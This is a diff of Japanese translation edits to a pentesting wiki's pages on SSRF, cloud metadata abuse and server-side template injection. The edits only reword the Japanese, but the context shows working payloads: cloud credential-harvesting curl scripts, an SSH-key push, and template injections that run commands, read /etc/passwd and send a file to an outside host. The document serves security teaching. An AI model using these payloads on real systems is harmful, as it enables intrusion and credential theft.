-- SSRF脆弱性を利用してローカルホスト上のSMTPサービスと対話する方法が説明されており、内部ドメイン名を明らかにし、その情報に基づいてさらなる調査を行う手順が含まれています。
+- SSRF脆弱性を悪用してローカルホスト上のSMTPサービスと対話する方法が説明されており、内部ドメイン名を明らかにし、その情報に基づいてさらなる調査を行う手順が含まれています。
 ```
 From https://twitter.com/har1sec/status/1182255952055164929
 1. connect with SSRF on smtp localhost:25
@@ -55,12 +55,12 @@ From https://twitter.com/har1sec/status/1182255952055164929
 4. connect
 ```
 - **Curl URL globbing - WAF バイパス**
-- SSRF が **curl** によって実行される場合、curl には WAF をバイパスするのに役立つ可能性のある [**URL globbing**](https://everything.curl.dev/cmdline/globbing) という機能があります。例えば、この [**writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-easylfi) では **`file` プロトコルを介したパストラバーサル** の例が見つかります。
+- SSRFが**curl**によって実行される場合、curlにはWAFをバイパスするのに役立つ可能性のある[**URL globbing**](https://everything.curl.dev/cmdline/globbing)という機能があります。例えば、この[**writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-easylfi)では、**`file`プロトコルを介したパストラバーサル**の例が見つかります。
 ```
 file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
 ```
 - **Gopher://**
-- GopherプロトコルのIP、ポート、バイトを指定してサーバーと通信する能力について説明し、ペイロードを作成するためのGopherusやremote-method-guesserなどのツールについても触れています。二つの異なる使用例が示されています：
+- GopherプロトコルのIP、ポート、バイトを指定してサーバーと通信する能力について、Gopherusやremote-method-guesserのようなツールを使ってペイロードを作成する方法が説明されています。二つの異なる使用例が示されています：
 
 ### Gopher://
 
@@ -133,7 +133,7 @@ openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
 
 ## PDFのレンダリング
 
-ウェブページが提供した情報を使って自動的にPDFを作成している場合、**PDF作成者**（サーバー）によってPDF作成中に実行されるJSを**挿入することができます**。これにより、SSRFを悪用することが可能です。[**こちらで詳細を確認してください**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**。**
+ウェブページが提供した情報で自動的にPDFを作成している場合、**PDF作成者**（サーバー）によってPDF作成中に実行されるJSを**挿入することができます**。これにより、SSRFを悪用することができます。[**詳細はこちら**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**。**
 
 ## SSRFからDoSへ
 
@@ -149,7 +149,7 @@ openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
 
 ## GopherへのSSRFリダイレクト
 
-いくつかのエクスプロイトには、**リダイレクトレスポンスを送信する必要があるかもしれません**（異なるプロトコルを使用するためにgopherなど）。ここでは、リダイレクトで応答するための異なるPythonコードがあります:
+いくつかのエクスプロイトには、**リダイレクトレスポンスを送信する**必要があるかもしれません（異なるプロトコルを使用するためにgopherなど）。ここでは、リダイレクトで応答するための異なるPythonコードがあります:
 ```python
 # First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
 from http.server import HTTPServer, BaseHTTPRequestHandler
@@ -206,7 +206,7 @@ app.run(threaded=False)
 ```
 </details>
 
-Flaskは**`@`**を初期文字として使用することを許可しており、**初期ホスト名をユーザー名**として使用し、新しいホスト名を注入することができます。攻撃リクエスト:
+Flaskは**`@`**を初期文字として使用することを許可しており、**初期ホスト名をユーザー名に**して新しいものを注入することができます。攻撃リクエスト:
 ```http
 GET @evildomain.com/ HTTP/1.1
 Host: target.com
@@ -245,7 +245,7 @@ var_dump($response);
 ```
 </details>
 
-PHPは、URLのパスのスラッシュの前に**char `*`を使用することを許可します**が、他にも制限があります。例えば、ルートパス `/` のみで使用でき、最初のスラッシュの前にドット `.` を使用することは許可されていないため、例えばドットなしの16進数エンコードされたIPアドレスを使用する必要があります。
+PHPは、URLのパスのスラッシュの前に**char `*`**を使用することを許可していますが、他にも制限があります。例えば、ルートパス `/` のみで使用でき、最初のスラッシュの前にドット `.` を使用することは許可されていません。そのため、例えばドットなしの16進数エンコードされたIPアドレスを使用する必要があります。
 ```http
 GET *@0xa9fea9fe/ HTTP/1.1
 Host: target.com
@@ -263,7 +263,7 @@ Connection: close
 
 [**`Singularity of Origin`**](https://github.com/nccgroup/singularity) は [DNS rebinding](https://en.wikipedia.org/wiki/DNS_rebinding) 攻撃を実行するためのツールです。攻撃サーバーの DNS 名の IP アドレスをターゲットマシンの IP アドレスに再バインドし、ターゲットマシン上の脆弱なソフトウェアを悪用するための攻撃ペイロードを提供するために必要なコンポーネントが含まれています。
 
-また、**http://rebind.it/singularity.html** にある **公開実行中のサーバー** もチェックしてください。
+また、**http://rebind.it/singularity.html** で **公開されているサーバー**もチェックしてください。
 
 ## DNS Rebidding + TLS セッション ID/セッションチケット
 
@@ -275,12 +275,12 @@ Connection: close
 
 攻撃：
 
-1. ユーザー/ボットに **攻撃者が制御するドメイン** に **アクセス** させる
-2. **DNS** の **TTL** は **0** 秒です（したがって、被害者はすぐにドメインの IP を再確認します）
-3. 被害者と攻撃者のドメインの間に **TLS 接続** が作成されます。攻撃者は **セッション ID またはセッションチケットの中に** **ペイロードを挿入** します。
-4. **ドメイン** は **自分自身** に対して **無限ループ** のリダイレクトを開始します。これの目的は、ユーザー/ボットがドメインにアクセスし続け、再度 **ドメインの DNS リクエスト** を行うことです。
+1. ユーザー/ボットに **攻撃者が制御するドメイン**に **アクセス**させる
+2. **DNS** の **TTL** は **0** 秒（したがって、被害者はすぐにドメインの IP を再確認します）
+3. 被害者と攻撃者のドメイン間に **TLS 接続**が作成されます。攻撃者は **セッション ID またはセッションチケットの中に** **ペイロードを挿入**します。
+4. **ドメイン**は **自分自身**に対して **無限ループ**のリダイレクトを開始します。これの目的は、ユーザー/ボットがドメインにアクセスし続け、再度 **DNS リクエスト**を実行させることです。
 5. DNS リクエストでは **プライベート IP** アドレスが **今** 与えられます（例えば 127.0.0.1）
-6. ユーザー/ボットは **TLS 接続を再確立しようとし**、そのために **セッション** ID/チケット ID（攻撃者の **ペイロード** が含まれていた）を **送信** します。おめでとうございます、あなたは **ユーザー/ボットに自分自身を攻撃させる** ことに成功しました。
+6. ユーザー/ボットは **TLS 接続を再確立しようとし**、そのために **セッション** ID/チケット ID（攻撃者の **ペイロード**が含まれていた）を **送信**します。おめでとうございます、あなたは **ユーザー/ボットに自分自身を攻撃させる**ことに成功しました。
 
 この攻撃中、localhost:11211 (_memcache_) を攻撃したい場合、被害者に www.attacker.com:11211 との初期接続を確立させる必要があります（**ポートは常に同じでなければなりません**）。\
 この攻撃を実行するには、次のツールを使用できます： [https://github.com/jmdx/TLS-poison/](https://github.com/jmdx/TLS-poison/)\
@@ -288,15 +288,15 @@ Connection: close
 
 ## ブラインド SSRF
 
-ブラインド SSRF と非ブラインド SSRF の違いは、ブラインドでは SSRF リクエストの応答を見ることができないことです。そのため、悪用が難しく、よく知られた脆弱性のみを悪用できることになります。
+ブラインド SSRF と非ブラインド SSRF の違いは、ブラインドでは SSRF リクエストの応答を見ることができないことです。そのため、悪用するのがより難しく、よく知られた脆弱性のみを悪用できることになります。
 
 ### 時間ベースの SSRF
 
 サーバーからの応答の **時間を確認することで、リソースが存在するかどうかを知ることができるかもしれません**（存在するリソースにアクセスするのにかかる時間が、存在しないリソースにアクセスするのにかかる時間よりも長いかもしれません）。
 
-## クラウド SSRF 悪用
+## クラウド SSRF 攻撃
 
-クラウド環境内で実行されているマシンに SSRF 脆弱性を見つけた場合、クラウド環境に関する興味深い情報や資格情報を取得できるかもしれません：
+クラウド環境内で実行されているマシンに SSRF 脆弱性を見つけた場合、クラウド環境や資格情報に関する興味深い情報を取得できるかもしれません：
 
 {{#ref}}
 cloud-ssrf.md
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
index 63853df87..bc7cb5628 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
@@ -8,14 +8,14 @@
 
 **メタデータ**エンドポイントは、任意のEC2マシン内からアクセスでき、興味深い情報を提供します。URLは`http://169.254.169.254`でアクセス可能です（[メタデータに関する情報はこちら](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)）。
 
-メタデータエンドポイントには**2つのバージョン**があります。**最初の**ものは、**GET**リクエストを介してエンドポイントに**アクセス**することを許可します（したがって、**SSRFがそれを悪用できます**）。**バージョン2**、[IMDSv2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html)では、**トークン**を要求するために**PUT**リクエストを送信し、**HTTPヘッダー**を使用して、そのトークンを使って別のHTTPヘッダーでメタデータにアクセスする必要があります（したがって、**SSRFで悪用するのがより複雑です**）。
+メタデータエンドポイントには**2つのバージョン**があります。**最初の**ものは、**GET**リクエストを介してエンドポイントに**アクセス**することを許可します（したがって、**SSRFがこれを悪用できます**）。**バージョン2**、[IMDSv2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html)では、**トークン**を要求するために**PUT**リクエストを送信し、**HTTPヘッダー**を使用して、そのトークンを使って別のHTTPヘッダーでメタデータにアクセスする必要があります（したがって、**SSRFで悪用するのがより複雑です**）。
 
 > [!CAUTION]
 > EC2インスタンスがIMDSv2を強制している場合、[**ドキュメントによると**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html)、**PUTリクエストの応答**は**ホップ制限が1**となり、EC2インスタンス内のコンテナからEC2メタデータにアクセスすることが不可能になります。
 >
-> さらに、**IMDSv2**は、**`X-Forwarded-For`ヘッダーを含むトークンを取得するリクエストをブロックします**。これは、誤って設定されたリバースプロキシがそれにアクセスできないようにするためです。
+> さらに、**IMDSv2**は、**`X-Forwarded-For`ヘッダーを含むトークンを取得するリクエストをブロックします**。これは、誤って設定されたリバースプロキシがアクセスできないようにするためです。
 
-[メタデータエンドポイントに関する情報はドキュメントにあります](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.html)。以下のスクリプトでは、そこからいくつかの興味深い情報が取得されます：
+[メタデータエンドポイントに関する情報はドキュメントにあります](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.html)。次のスクリプトでは、そこからいくつかの興味深い情報が取得されます：
 ```bash
 EC2_TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
 HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
@@ -90,13 +90,13 @@ aws_session_token = AgoJb3JpZ2luX2VjEGcaCXVzLXdlc3QtMiJHMEUCIHgCnKJl8fwc+0iaa6n4
 ```
 **aws_session_token**に注意してください。これはプロファイルが機能するために不可欠です。
 
-[**PACU**](https://github.com/RhinoSecurityLabs/pacu)は、発見された資格情報を使用して、あなたの権限を確認し、権限を昇格させる試みをすることができます。
+[**PACU**](https://github.com/RhinoSecurityLabs/pacu)は、発見された資格情報を使用して、あなたの権限を確認し、権限を昇格させる試みを行うことができます。
 
 ### AWS ECS (コンテナサービス) のSSRF資格情報
 
 **ECS**は、アプリケーションを実行するためのEC2インスタンスの論理グループであり、ECSがクラスター管理インフラストラクチャを管理するため、自分でスケールする必要はありません。**ECS**で実行されているサービスを侵害することに成功すれば、**メタデータエンドポイントが変更されます**。
 
-_**http://169.254.170.2/v2/credentials/\<GUID>**_にアクセスすると、ECSマシンの資格情報が見つかります。しかし、まずは**\<GUID>**を見つける必要があります。\<GUID>を見つけるには、マシン内の**environ**変数**AWS_CONTAINER_CREDENTIALS_RELATIVE_URI**を読む必要があります。\
+_**http://169.254.170.2/v2/credentials/\<GUID>**_にアクセスすると、ECSマシンの資格情報が見つかります。しかし、まずは**\<GUID>**を見つける必要があります。\<GUID>を見つけるには、マシン内の**environ**変数**AWS_CONTAINER_CREDENTIALS_RELATIVE_URI**を読み取る必要があります。\
 **Path Traversal**を利用して`file:///proc/self/environ`を読み取ることができるかもしれません。\
 前述のhttpアドレスは、**AccessKey、SecretKey、およびトークン**を提供するはずです。
 ```bash
@@ -118,7 +118,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null |
 さらに、IAM資格情報に加えて、Lambda関数には**関数が開始されるときに関数に渡されるイベントデータ**もあります。このデータは[ランタイムインターフェース](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html)を介して関数に提供され、**機密**の**情報**（**stageVariables**内のような）を含む可能性があります。IAM資格情報とは異なり、このデータは標準のSSRFを介して**`http://localhost:9001/2018-06-01/runtime/invocation/next`**でアクセス可能です。
 
 > [!WARNING]
-> **lambda資格情報**は**環境変数**内にあります。したがって、lambdaコードの**スタックトレース**が環境変数を印刷する場合、アプリでエラーを引き起こすことによって**それらを流出させる**ことが可能です。
+> **lambda資格情報**は**環境変数**内にあります。したがって、lambdaコードの**スタックトレース**が環境変数を印刷する場合、アプリでエラーを引き起こすことによって**それらを流出させる**可能性があります。
 
 ### AWS Elastic BeanstalkのSSRF URL <a href="#id-6f97" id="id-6f97"></a>
 
@@ -133,7 +133,7 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean
 ```
 ![](https://miro.medium.com/max/60/0*4OG-tRUNhpBK96cL?q=20) ![](https://miro.medium.com/max/1469/0*4OG-tRUNhpBK96cL)
 
-次に、`aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`を使用して認証情報を使用します。
+次に、`aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`の資格情報を使用します。
 
 ## GCP <a href="#id-6440" id="id-6440"></a>
 
@@ -262,7 +262,7 @@ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXX
 "access_type": "offline"
 }
 ```
-今すぐSSHキーをプッシュします。
+SSHキーをプッシュします。
 ```bash
 curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata"
 -H "Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA"
@@ -271,7 +271,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo
 ```
 ### Cloud Functions <a href="#id-9f1f" id="id-9f1f"></a>
 
-メタデータエンドポイントはVMと同様に機能しますが、一部のエンドポイントがありません：
+メタデータエンドポイントはVMと同様に機能しますが、一部のエンドポイントがありません:
 ```bash
 # /project
 # Project name and number
@@ -323,15 +323,15 @@ curl http://169.254.169.254/metadata/v1.json | jq
 - `X-Forwarded-For` ヘッダーを **含まないこと**
 
 > [!TIP]
-> Azure VM には 1 つのシステム管理アイデンティティと複数のユーザー管理アイデンティティが付与される可能性があります。これは基本的に、**VM に付与されたすべての管理アイデンティティを偽装できる**ことを意味します。
+> Azure VM には 1 つのシステム管理アイデンティティと複数のユーザー管理アイデンティティをアタッチできます。これは基本的に、**VM にアタッチされたすべての管理アイデンティティを偽装できる**ことを意味します。
 >
 > **デフォルト**では、メタデータエンドポイントは **システム割り当て MI (ある場合)** を使用します。
 >
-> 残念ながら、VM に付与されたすべての MI を示すメタデータエンドポイントは見つかりませんでした。
+> 残念ながら、VM にアタッチされたすべての MI を示すメタデータエンドポイントは見つかりませんでした。
 >
-> したがって、すべての付与された MI を見つけるには、次のことを行うことができます：
+> したがって、アタッチされたすべての MI を見つけるには、次のことを行うことができます：
 >
-> - **az cli** を使用して **付与されたアイデンティティを取得** (Azure テナント内で既にプリンシパルを侵害している場合)
+> - **az cli** を使用して **アタッチされたアイデンティティを取得** (Azure テナント内で既にプリンシパルを侵害している場合)
 >
 > ```bash
 > az vm identity show \
@@ -339,7 +339,7 @@ curl http://169.254.169.254/metadata/v1.json | jq
 >   --name <vm-name>
 > ```
 >
-> - メタデータ内のデフォルトの付与された MI を使用して **付与されたアイデンティティを取得**：
+> - メタデータ内のデフォルトアタッチ MI を使用して **アタッチされたアイデンティティを取得**：
 >
 > ```bash
 > export API_VERSION="2021-12-13"
@@ -357,19 +357,19 @@ curl http://169.254.169.254/metadata/v1.json | jq
 > export VM_NAME=$(curl -s -H "Metadata:true" \
 >   "http://169.254.169.254/metadata/instance?api-version=$API_VERSION" | jq -r '.compute.name')
 >
-> # 付与された MI を取得しようとする
+> # アタッチされた MI を取得しようとする
 > curl -s -H "Authorization: Bearer $TOKEN" \
 >   "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Compute/virtualMachines/$VM_NAME?api-version=$API_VERSION" | jq
 > ```
 >
-> - テナント内で定義されたすべての管理アイデンティティを **取得し**、どれかが VM に付与されているかを **ブルートフォース** で確認：
+> - テナント内で定義されたすべての管理アイデンティティを **取得し**、どれかが VM にアタッチされているかを **ブルートフォース** で確認：
 >
 > ```bash
 > az identity list
 > ```
 
 > [!CAUTION]
-> トークンリクエストでは、`object_id`、`client_id`、または `msi_res_id` のいずれかのパラメータを使用して、使用したい管理アイデンティティを指定します ([**docs**](https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/how-to-use-vm-token))。指定がない場合、**デフォルト MI が使用されます**。
+> トークンリクエストでは、使用したい管理アイデンティティを示すために `object_id`、`client_id`、または `msi_res_id` のいずれかのパラメータを使用してください ([**docs**](https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/how-to-use-vm-token))。いずれも指定しない場合、**デフォルト MI が使用されます**。
 
 {{#tabs}}
 {{#tab name="Bash"}}
@@ -572,13 +572,13 @@ Packetcloudのメタデータにアクセスするためのドキュメントは
 
 ## OpenStack/RackSpace
 
-ヘッダーの必要性は言及されていません。メタデータには以下を通じてアクセスできます:
+ヘッダーの必要性は言及されていません。メタデータには次の方法でアクセスできます:
 
 - `http://169.254.169.254/openstack`
 
 ## HP Helion
 
-ここでもヘッダーの必要性は言及されていません。メタデータには以下でアクセスできます:
+ここでもヘッダーの必要性は言及されていません。メタデータには次の場所でアクセスできます:
 
 - `http://169.254.169.254/2009-04-04/meta-data/`
 
@@ -601,7 +601,7 @@ Alibabaは、インスタンスおよびイメージIDにアクセスするた
 
 ## Kubernetes ETCD
 
-Kubernetes ETCDはAPIキー、内部IPアドレス、およびポートを保持できます。アクセスは以下のように示されます:
+Kubernetes ETCDは、APIキー、内部IPアドレス、およびポートを保持できます。アクセスは次のように示されます:
 
 - `curl -L http://127.0.0.1:2379/version`
 - `curl http://127.0.0.1:2379/v2/keys/?recursive=true`
@@ -618,7 +618,7 @@ Dockerメタデータにはローカルでアクセスでき、コンテナお
 
 ## Rancher
 
-Rancherのメタデータには以下を使用してアクセスできます:
+Rancherのメタデータには次のようにアクセスできます:
 
 - `curl http://rancher-metadata/<version>/<path>`
 
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
index aa74a491d..034bb0a2c 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
@@ -1,4 +1,4 @@
-# URL Format Bypass
+# URLフォーマットバイパス
 
 {{#include ../../banners/hacktricks-training.md}}
 
@@ -153,7 +153,7 @@ https://metadata/expected/path/..%2f..%2f/vulnerable/path
 ```
 ### Fuzzing
 
-ツール [**recollapse**](https://github.com/0xacb/recollapse) は、与えられた入力からバリエーションを生成し、使用されている正規表現をバイパスしようとします。詳細については、[**この投稿**](https://0xacb.com/2022/11/21/recollapse/) を確認してください。
+ツール [**recollapse**](https://github.com/0xacb/recollapse) は、与えられた入力からバリエーションを生成し、使用されている正規表現をバイパスしようとします。詳細については [**この投稿**](https://0xacb.com/2022/11/21/recollapse/) を確認してください。
 
 ### Automatic Custom Wordlists
 
@@ -164,7 +164,7 @@ https://metadata/expected/path/..%2f..%2f/vulnerable/path
 ### Bypass via redirect
 
 サーバーがSSRFの**元のリクエストをフィルタリングしている**が、そのリクエストに対する**リダイレクト**レスポンスはフィルタリングしていない可能性があります。\
-例えば、`url=https://www.google.com/` を介してSSRFに脆弱なサーバーは、**urlパラメータをフィルタリングしている**かもしれません。しかし、リダイレクトしたい場所に302で応答する[pythonサーバーを使用する](https://pastebin.com/raw/ywAUhFrv)と、127.0.0.1のような**フィルタリングされたIPアドレス**や、gopherのようなフィルタリングされた**プロトコル**に**アクセスできる**かもしれません。\
+例えば、`url=https://www.google.com/` を介してSSRFに脆弱なサーバーは、**urlパラメータをフィルタリングしている**かもしれません。しかし、リダイレクトしたい場所に302で応答する [pythonサーバーを使用する](https://pastebin.com/raw/ywAUhFrv) と、127.0.0.1のようなフィルタリングされたIPアドレスや、gopherのようなフィルタリングされた**プロトコル**に**アクセスできる**かもしれません。\
 [このレポートをチェックしてください。](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
 ```python
 #!/usr/bin/env python3
@@ -188,9 +188,9 @@ HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
 ```
 ## 説明されたトリック
 
-### バックスラストリック
+### バックスラッシュトリック
 
-_バックスラストリック_は、[WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing)と[RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B)の違いを利用します。RFC3986はURIの一般的なフレームワークですが、WHATWGはウェブURLに特化しており、現代のブラウザに採用されています。重要な違いは、WHATWG標準がバックスラッシュ（`\`）をフォワードスラッシュ（`/`）と同等と認識している点で、これがURLの解析方法に影響を与え、特にホスト名からパスへの遷移を示します。
+_the backslash-trick_ は、[WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing) と [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B) の違いを利用します。RFC3986はURIの一般的なフレームワークですが、WHATWGはウェブURLに特化しており、現代のブラウザに採用されています。重要な違いは、WHATWG標準がバックスラッシュ（`\`）をフォワードスラッシュ（`/`）と同等と認識している点で、これがURLの解析方法に影響を与え、特にホスト名からパスへの遷移を示します。
 
 ![https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec_difference.jpg](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec_difference.jpg)
 
diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md
index 14770de62..420f3b9a3 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/README.md
@@ -7,7 +7,7 @@
 
 サーバーサイドテンプレートインジェクションは、攻撃者がサーバー上で実行されるテンプレートに悪意のあるコードを注入できるときに発生する脆弱性です。この脆弱性は、Jinjaを含むさまざまな技術で見られます。
 
-Jinjaは、ウェブアプリケーションで使用される人気のテンプレートエンジンです。Jinjaを使用した脆弱なコードスニペットを示す例を考えてみましょう:
+Jinjaは、ウェブアプリケーションで使用される人気のあるテンプレートエンジンです。Jinjaを使用した脆弱なコードスニペットを示す例を考えてみましょう:
 ```python
 output = template.render(name=request.args.get('name'))
 ```
@@ -17,7 +17,7 @@ output = template.render(name=request.args.get('name'))
 ```
 http://vulnerable-website.com/?name={{bad-stuff-here}}
 ```
-ペイロード `{{bad-stuff-here}}` は `name` パラメータに注入されます。このペイロードには、攻撃者が不正なコードを実行したり、テンプレートエンジンを操作したりすることを可能にする Jinja テンプレートディレクティブが含まれる可能性があります。これにより、サーバーの制御を得ることができます。
+ペイロード `{{bad-stuff-here}}` が `name` パラメータに注入されます。このペイロードには、攻撃者が不正なコードを実行したり、テンプレートエンジンを操作したりすることを可能にする Jinja テンプレートディレクティブが含まれる可能性があります。これにより、サーバーの制御を得ることができます。
 
 サーバーサイドテンプレートインジェクションの脆弱性を防ぐために、開発者はユーザー入力がテンプレートに挿入される前に適切にサニタイズおよびバリデーションされていることを確認する必要があります。入力バリデーションを実装し、コンテキストに応じたエスケープ技術を使用することで、この脆弱性のリスクを軽減できます。
 
@@ -28,7 +28,7 @@ http://vulnerable-website.com/?name={{bad-stuff-here}}
 - 脆弱性を明らかにするエラーが発生し、テンプレートエンジンが特定される可能性があります。
 - 反映にペイロードが存在しない、またはその一部が欠けている場合、サーバーが通常のデータとは異なる方法で処理していることを示唆します。
 - **プレーンテキストコンテキスト**: サーバーがテンプレート式を評価するかどうかを確認することで XSS と区別します (例: `{{7*7}}`, `${7*7}`)。
-- **コードコンテキスト**: 入力パラメータを変更することで脆弱性を確認します。例えば、`http://vulnerable-website.com/?greeting=data.username` の `greeting` を変更して、サーバーの出力が動的か固定かを確認します。例えば、`greeting=data.username}}hello` がユーザー名を返すかどうかを確認します。
+- **コードコンテキスト**: 入力パラメータを変更することで脆弱性を確認します。例えば、`http://vulnerable-website.com/?greeting=data.username` の `greeting` を変更して、サーバーの出力が動的か固定かを確認します。例えば、`greeting=data.username}}hello` がユーザー名を返すかどうかです。
 
 #### 識別フェーズ
 
@@ -123,7 +123,7 @@ ${dwf.newInstance(ec,null)("id")}
 ```
 **詳細情報**
 
-- [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)のFreeMarkerセクション
+- [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection) のFreeMarkerセクション
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker)
 
 ### Velocity (Java)
@@ -180,7 +180,7 @@ Thymeleafはまた、ダブルアンダースコア（`__...__`）内の式を
 ```
 **Thymeleafにおける脆弱性の例**
 
-以下のコードスニペットは、悪用される可能性があります:
+以下のコードスニペットを考えてみてください。これは悪用される可能性があります：
 ```xml
 <a th:href="@{__${path}__}" th:title="${title}">
 <a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>
@@ -204,9 +204,9 @@ el-expression-language.md
 ```
 **フィルターをバイパスする**
 
-複数の変数式を使用できます。`${...}`が機能しない場合は、`#{...}`、`*{...}`、`@{...}`、または`~{...}`を試してください。
+`${...}` が機能しない場合は、複数の変数式を使用できます。`#{...}`、`*{...}`、`@{...}`、または `~{...}` を試してください。
 
-- `/etc/passwd`を読み取る
+- `/etc/passwd` を読み取る
 ```java
 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 ```
@@ -258,11 +258,11 @@ el-expression-language.md
 
 - `{{ someString.toUPPERCASE() }}`
 
-Pebbleの古いバージョン（< version 3.0.9）：
+Pebbleの古いバージョン ( < version 3.0.9):
 ```java
 {{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}
 ```
-新しいバージョンの Pebble:
+新しいバージョンのPebble:
 ```java
 {% raw %}
 {% set cmd = 'id' %}
@@ -290,7 +290,7 @@ Pebbleの古いバージョン（< version 3.0.9）：
 {{'a'.toUpperCase()}} would result in 'A'
 {{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
 ```
-JinjavaはHubspotによって開発されたオープンソースプロジェクトで、[https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)で入手できます。
+JinjavaはHubspotによって開発されたオープンソースプロジェクトで、[https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)で入手可能です。
 
 **Jinjava - コマンド実行**
 
@@ -376,7 +376,7 @@ Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstanc
 Expression Language (EL) は、JavaEEにおけるプレゼンテーション層（ウェブページなど）とアプリケーションロジック（マネージドビーンなど）との相互作用を促進する基本的な機能です。この通信を効率化するために、複数のJavaEE技術で広く使用されています。ELを利用する主要なJavaEE技術には以下が含まれます：
 
 - **JavaServer Faces (JSF)**: JSFページ内のコンポーネントを対応するバックエンドデータおよびアクションにバインドするためにELを使用します。
-- **JavaServer Pages (JSP)**: JSP内でデータにアクセスし操作するためにELが使用され、ページ要素をアプリケーションデータに接続しやすくします。
+- **JavaServer Pages (JSP)**: JSP内でデータにアクセスし操作するためにELが使用され、ページ要素とアプリケーションデータを接続しやすくします。
 - **Contexts and Dependency Injection for Java EE (CDI)**: ELはCDIと統合され、ウェブ層とマネージドビーン間のシームレスな相互作用を可能にし、より一貫したアプリケーション構造を確保します。
 
 **ELインタープリタの悪用**について詳しくは、以下のページを確認してください：
@@ -432,7 +432,7 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
 ```
 **詳細情報**
 
-- Smartyセクションの [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
+- Smartyセクションについては[https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)を参照してください
